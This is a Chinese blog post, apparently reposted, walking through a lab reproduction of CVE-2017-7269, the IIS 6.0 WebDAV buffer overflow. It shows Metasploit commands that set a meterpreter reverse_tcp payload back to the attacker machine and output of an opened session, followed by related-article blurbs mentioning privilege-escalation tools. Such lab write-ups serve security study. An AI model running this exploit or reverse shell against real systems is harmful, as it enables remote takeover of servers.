IIS6.0(CVE-2017-7269) 缓冲器溢出

最新推荐文章于 2024-06-18 09:33:50 发布
最新推荐文章于 2024-06-18 09:33:50 发布
阅读量450 收藏 1
点赞数
文章标签: 网络
原文链接:http://www.cnblogs.com/kuaile1314/p/11489707.html
版权

漏洞描述
开启WebDAV服务对IIS 6.0存在缓冲区溢出漏洞都可以导致远程代码执行,所以对于目前的IIS 6.0用户而言,可用的变通方案就是关闭WebDAV服务。

漏洞编号
CVE-2017-7269

漏洞等级
高危

影响产品
Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0

漏洞环境搭建
我的环境是windows 2003 R2 Enterprise Edition,安装好IIS 6.0 之后进入服务管理,在管理器中,有一个windows拓展,拓展中有一个webdav选项,该选项默认时禁止状态,右键选择允许就可以了。

随后windows+R–>services.msc–>打开webcClient服务,完成配置


漏洞测试
攻击机:kali IP :192.168.48.131
受害机:windows2003 IP :192.168.48.146
下载exploit:https://github.com/Al1ex/CVE-2017-7269
将exp放到
/usr/share/metasploitframework/modules/exploits/windows/iis目录下

msf > search cve-2017-7269

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/iis/cve-2017-7269 2017-03-31 good CVE-2017-7269 Microsoft IIS WebDav ScStoragePathFromUrl Overflow
exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Microsoft IIS WebDav ScStoragePathFromUrl Overflow


msf > use exploit/windows/iis/cve-2017-7269
msf exploit(windows/iis/cve-2017-7269) > show options

Module options (exploit/windows/iis/cve-2017-7269):

Name Current Setting Required Description
---- --------------- -------- -----------
HttpHost localhost yes http host for target
PhysicalPathLength 19 yes length of physical path for target(include backslash)
RHOST yes The target address
RPORT 80 yes The target port (TCP)


Exploit target:

Id Name
-- ----
0 Microsoft Windows Server 2003 R2


msf exploit(windows/iis/cve-2017-7269) > set RHOST 192.168.48.146 //设置对方ip
RHOST => 192.168.48.146
msf exploit(windows/iis/cve-2017-7269) > set HttpHost 192.168.48.146 //设置对方网站
HttpHost => 192.168.48.146
msf exploit(windows/iis/cve-2017-7269) > set payload windows/meterpreter/reverse_tcp //设置返回载荷
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/iis/cve-2017-7269) > set LHOST 192.168.48.131 //设置本机ip
LHOST => 192.168.48.131
msf exploit(windows/iis/cve-2017-7269) > exploit //溢出

[*] Started reverse TCP handler on 192.168.48.131:4444
[*] Sending stage (179779 bytes) to 192.168.48.146
[*] Meterpreter session 1 opened (192.168.48.131:4444 -> 192.168.48.146:1043) at 2018-01-24 22:49:23 +0800

meterpreter >

 

 

 

 

 

转载于:https://www.cnblogs.com/kuaile1314/p/11489707.html

weixin_30377461
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
分区起始位置参数溢出_IIS6.0缓冲区溢出漏洞深度分析(CVE20177269
weixin_32998219的博客
12-13 750
漏洞描述开启WebDAV服务的IIS6.0存在缓冲区溢出漏洞可以任意代码执行,目前针对WindowsServer2003R2可以稳定利用。在WebDAV服务的ScStoragePathFromUrl函数存在缓冲区溢出漏洞,恶意访问者通过构造以If:header 头的 PROPFIND请求执行任意代码。工具环境windbg:用于附加w3wp进程进行动态调试IDA:用于对ht...
黑客级技术--缓冲区溢出攻击(上)
【GTA: Vice City】
11-27 1976
缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统、应用软件广泛存在。利用缓冲区溢出攻击,可以导致程序运行失败、系统当机、重新启动等后果。更为严重的是,可以利用它执行非授权指令,甚至可以取得系统特权,进而进行各种非法操作。缓冲区溢出攻击有多种英文名称:buffer overflow,buffer overrun,smash the stack,trash the stack,scribbl
探索网络安全的新边界:修复版MSF模块CVE-2017-7269漏洞利用工具
最新发布
gitblog_00066的博客
06-18 422
探索网络安全的新边界:修复版MSF模块CVE-2017-7269漏洞利用工具 项目地址:https://gitcode.com/zcgonvh/cve-2017-7269网络安全的世界里,及时发现和修复漏洞至关重要。今天,我们要向您推介一个针对CVE-2017-7269的修复版Metasploit(MSF)模块,这是一个精心优化的工具,能帮助安全研究人员和管理员更有效地测试和防范Windows...
修复缓冲区溢出问题
05-15 1330
<!-- alimama_pid="mm_10249644_1605763_4929893"; alimama_titlecolor="707070"; alimama_descolor ="CCCCCC"; alimama_bgcolor="FFFFFF"; alimama_bordercolor="FFFFFF"; alimama_linkcolor="DADA
IIS .ASP文件缓冲区溢出漏洞
shaily读书学习
05-06 1733
涉及程序: ASP   描述: IIS .ASP文件缓冲区溢出漏洞   详细: 在Microsoft IIS 4.0的.ASP ISAPI文件解析机制存在一个缓冲区溢出漏洞,利用该漏洞将可以获得SYSTEM水平的访问权限。 该漏洞是一个本地漏洞,但如果攻击者可以上传.acp文件,它将被远程利用。 在对Java Script"LANGUAGE"变量的处理,如果提供一个超长的字符串给"LANGU
winserver2008/iis7缓冲区溢出提权0day
09-13
一个很NB的工具。适用于iis7/iis7.5。溢出提权。 webshell提权、本地提权居家、放火必备。
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017...
cve-2017-7269.rb
04-11
msfconsole,webdav漏洞,iis服务提权工具。
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
cve-2017-7269-iis6.0环境搭建及复现过程
04-30
### cve-2017-7269-iis6.0环境搭建及复现过程 #### 一、背景介绍 CVE-2017-7269 是一个针对Microsoft IIS 6.0 WebDAV扩展的远程代码执行漏洞。此漏洞允许攻击者在未经过身份验证的情况下向IIS 6.0服务器发送恶意...
cve-2017-7269-iis6.0 poc metersploit
04-30
cve-2017-7269-iis6.0 的poc 再metersploit使用,亲测可用。
IIS6缓冲区超过其配置限制
05-18
IIS6缓冲区超过其配置限制 在IIS6上运行ASP的时候,有时候会出现:“IIS6缓冲区超过其配置限制”这个错误,原因是asp脚本最后产生的页面太大,超过缓冲区大小。我们的报表有服务器端分页,每页行数由用户设置,设置为0的时候表示一页显示,这样,当数据太多并且一页显示的时候会报错,比如有个固定资产的表,设置为每页30行的时候有580页,可以正常显示,但是设置为每页0行的时候就无法显示了,原来的代码处理的时候,每当记录数超过一定范围的时候(比如900条数据),就Respond.flush一下,清空缓冲区保证可以再使用。不过新版本代码,没有合适的地方再加Respond.flush这一句,代码改起来比较麻烦。 从Google上搜索了一下解决办法,在这里集一下,通通没有验证,不过应该有管用的;) 1.asp页面合适的地方加入Respond.flush 以下都是各处copy的: -修改IIS配置的: 2.停止IIS服务,然后用记事本修改C:\WINDOWS\system32\inetsrv\MetaBase.xml 的: AspBufferingLimit="4194304" //即默认4M 为: AspBufferingLimit="8388608" //改为8M或更多 重启IIS 3.可以在“C:\Inetpub\AdminScripts”路径下在命令行输入: adsutil set w3svc/2/root/autoupdate/aspbuf-feringlimit -1 adsutil set w3svc/aspbufferinglimit -1 命令来将缓存还原(默认大小为4MB),如果当前需要Response的大小超过这个限制,那么可以尝试将-1改为相应的大小,比如40MB就是41943040: adsutil set w3svc/aspbufferinglimit 41943040 注:2,3应该是殊途同归。 4.在IIS"主目录"-"配置"-"选项",将启用缓存前面的勾去掉,即禁用缓存。 注:比较怀疑这个说法,即便管用,对性能应该也有一些影响。不过还是列出来,以后可以试一下。 -修改单个页面的: 5.可以通过服务器端iis里设置缓冲区大小,也可以通过程序更改这一值 <%@ page buffer="10240kb" autoFlush="false" %> 注: buffer:他的值可以是"none"或者一个数值。 指定处理JSP工作时的out处理网页出入内容 的模式。如果值为none,那么就不会有缓存,而所有的输出都是由servletresponse的printerwriter。 若是一个数值,表示缓存的大小,单位是kb,那么输出的缓存大小至少会大于这个值。 根据autoFlush(可取true或者false)属性而定,输入内容超出缓存大小时是否要清除(true)还是产 生异常(false)。一般的,缓存设置为8kb以 6.可以在ASP应用程序的头部添加如下语句: <%Response.Buffer = False%> 注:同4. 个人认为如果第5个办法管用的话,还是比较好的,比较环保。
Microsoft IIS WebDav 'ScStoragePathFromUrl' Remote Buffer Overflow (CVE-2017-7269)
ai749499的博客
01-07 325
ExplodingCanhttps://github.com/danigargu/explodingcan An implementation of ExplodingCan's exploit extracted from FuzzBunch, the "Metasploit" of the NSA. Details Vulnerability: Microsoft...
CVE-2017-7269iis6.0远程代码执行漏洞复现)
热门推荐
Fly_鹏程万里
05-04 1万+
前言趁着有时间,没事干,无聊!所以就拿CVE-2017-7269做一个简单的漏洞复现实战演练!下面就对该漏洞进行简单的简介以及复现。漏洞描述漏洞编号:CVE-2017-7269发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)漏洞描述:IIS 6.0默认不开启WebDAV,一旦开启了WebDAV支持,安装了IIS6.0的服务器将可能受到该漏洞...
网络安全2017-7269安全漏洞解析
qq_63060814的博客
04-04 6319
1,使用命令zenmap打开nmap图形化扫描工具,选择配置,点击新的配置或命令 找到模块http-webdav-scan,勾上选用该模块对目标靶机进行扫描 根据扫描结果的信息可以找到靶机的操作系统为Microsoft Windows Server 2003 R2,并且开启WebDAV服务的IIS6.0,初步可以确认该漏洞存在 服务器版本信息: 使用msfconsole命令打开metasploit漏洞测试平台 使用search命令搜索cve-2017-7269 ...
IIS 6.0 WebDAV远程代码执行0day漏洞 CVE-2017-7269 PoC已经公开了 但Windows 2003已经没有更新服务了...
weixin_34301132的博客
09-01 723
3月27日,在Windows 2003 R2上使用IIS 6.0 爆出了0Day漏洞(CVE-2017-7269,CNNVD-201703-1151),PoC开始流传,但糟糕的是这产品已经停止更新了,建议大家要么关闭IIS 下的WebDAV服务,要么升级到Windows 2016。绿盟科技发布威胁预警通告,全文如下。 Update:绿盟科技已经发布了该...
cve-2017-7269(远程代码执行漏洞)复现
嗷空酒的博客
12-11 1106
cve_2017_7269漏洞属于高危漏洞,是由Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)发现的。IIS 6.0开启Webdav服务的服务器被爆存在缓存区溢出漏洞导致远程代码随意执行,目前针对 Windows Server 2003 R2 可以稳定利用;
.Net IIS 内存溢出(System.OutOfMemoryException)
长安诗社社长@-梁瀚文- https://github.com/HevnChin https://gitee.com/HevnChin
02-18 3109
.Net IIS 内存溢出(System.OutOfMemoryException)的常见情况和处理方式总结 原因是页面上数据量大,缓存太多。
iis6.0cve-2017-7269)最完整的利用,从远程利用,到本地提权,再到常见失败原因
redwand的博客
05-04 1259
网上看到的iis6.0cve-2017-7269)的利用文章,要么只有远程利用不包含本地提权,要么包含本地提权却没有常见失败原因,故有此文 本篇文章面向有一点windows命令行基础,kali基础,msf基础的同学
IIS6.0 CVE-2017-7269漏洞:远程利用与本地提权详解
"本文主要介绍如何利用IIS6.0CVE-2017-7269漏洞进行远程利用和本地提权,以及在过程可能遇到的常见问题。" 在网络安全领域,IIS (Internet Information Services) 是微软公司提供的一个用于Windows操作系统的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值